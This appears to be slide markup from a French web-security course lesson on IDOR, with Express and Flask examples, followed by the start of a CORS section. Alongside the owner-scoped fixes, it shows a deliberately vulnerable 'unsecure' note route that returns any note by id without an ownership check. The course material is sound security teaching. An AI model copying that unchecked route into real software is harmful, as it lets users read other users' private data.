              <a:t>  if (!row) return res.status(404).json({ error: "not found" });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  req.order = row;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  next();</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app.get("/api/orders/:id", requireUser, requireOwner, (req, res) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  res.json(req.order);</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Flask</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L’équivalent : deux décorateurs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="44165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44165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Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="403250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from functools import wraps</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def require_user(fn):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    @wraps(fn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    def inner(*a, **k):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        if g.user is None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            return jsonify(error="auth"), 401</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        return fn(*a, **k)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return inner</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def require_owner(fn):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    @wraps(fn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    def inner(oid, *a, **k):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        row = db.execute(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            "SELECT * FROM orders WHERE id = ? AND owner_id = ?",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            (oid, g.user["id"]),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        ).fetchone()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        if row is None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            return jsonify(error="not found"), 404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        g.order = row</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        return fn(oid, *a, **k)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return inner</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@app.get("/api/orders/&lt;int:oid&gt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@require_user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@require_owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def get_order(oid):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return jsonify(g.order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <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02 · URL</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200 n’est pas un fichier. C’est un paramètre.</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La barre d’adresse  ·  http://127.0.0.1:8033/unsecure/notes/200/</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GET  /unsecure/notes/200/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  ressource ──┘        └── l'id. Un paramètre.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                            vous le changez : autre ligne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Le navigateur n’ouvre pas un dossier « 200 ». Il envoie ce chiffre au serveur. C’est ça, un paramètre d’URL.</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02 · REST</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:noteId — un segment d’URL, une variable</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day-3/s2_01_idor. Express : /api/unsecure/notes/:noteId. Flask : /notes/&lt;id&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le morceau entre les slash devient request.params.noteId. C’est le Direct Object Reference.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s2-rest-segment.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931396" y="1591056"/>
            <a:ext cx="4298726"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requireUser, loadDocument : la note est chargée. Le propriétaire, lui, n’est pas vérifié. Voilà l’IDOR.</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02 · Express</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:noteId  —  Express lit le segment</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app.get("/api/unsecure/notes/:noteId"). Les deux-points : c’est un paramètre, pas un dossier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requireUser, loadDocument, puis response.json. Le owner, toujours pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s2-express-noteid.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="4992624" cy="1956174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="d3s2-loadDocument.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163056" y="1591056"/>
            <a:ext cx="4992624" cy="1574471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3602094"/>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À gauche : :noteId. À droite : loadDocument lit params.noteId. Toujours pas le owner.</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02 · Flask</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&lt;int:note_id&gt;  —  Flask, même trou</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python-flask  ·  unsecure_note</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@app.get("/api/unsecure/notes/&lt;int:note_id&gt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def unsecure_note(note_id: int):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    auth_error = require_user()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    if auth_error:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        return auth_error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    note = document_by_id(note_id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    if note is None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        return jsonify(ok=False, error="Note introuvable."), 404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return jsonify(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        ok=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        note=note,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        warning="Le propriétaire de la note n'a pas été vérifié.",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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&lt;int:note_id&gt; est le :noteId d’Express. Un argument de fonction. Pas une preuve de droit.</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expliquer IDOR, le mot</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scoper avec owner_id, répondre 404</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le sortir en middleware / décorateur</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IDOR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expliquer IDOR, le mot</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Insecure Direct Object Reference : l’id dans l’URL, sans vérifier que cet objet est à vous.</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scoper avec owner_id, répondre 404</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WHERE id = ? AND owner_id = ?. 403 donne l’annuaire.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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le sortir en middleware / décorateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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Express : requireOwner. Flask : @require_owner. Une fois, toutes les routes.</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138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03</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CORS, secrets, headers, logging</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hygiène du serveur  ·  Flask et Express</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139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03 · CORS</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CORS n’est pas un firewall</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CORS dit au navigateur : tel JS a-t-il le droit de LIRE cette réponse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un POST simple part quand même. CORS n’empêche pas d’appeler le serveur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Même mécanisme, deux étages : allow-list dans le code, ACAO sur le fil. Pas deux headers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="1946300" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8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066940" y="1161288"/>
            <a:ext cx="1298448" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>client facing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702552" y="1490472"/>
            <a:ext cx="1617116" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ACAO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702552" y="1920240"/>
            <a:ext cx="1617116" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Header de réponse.
Ce que le navigateur lit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9117939" y="1051560"/>
            <a:ext cx="1946300" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8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646920" y="1161288"/>
            <a:ext cx="1298448" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
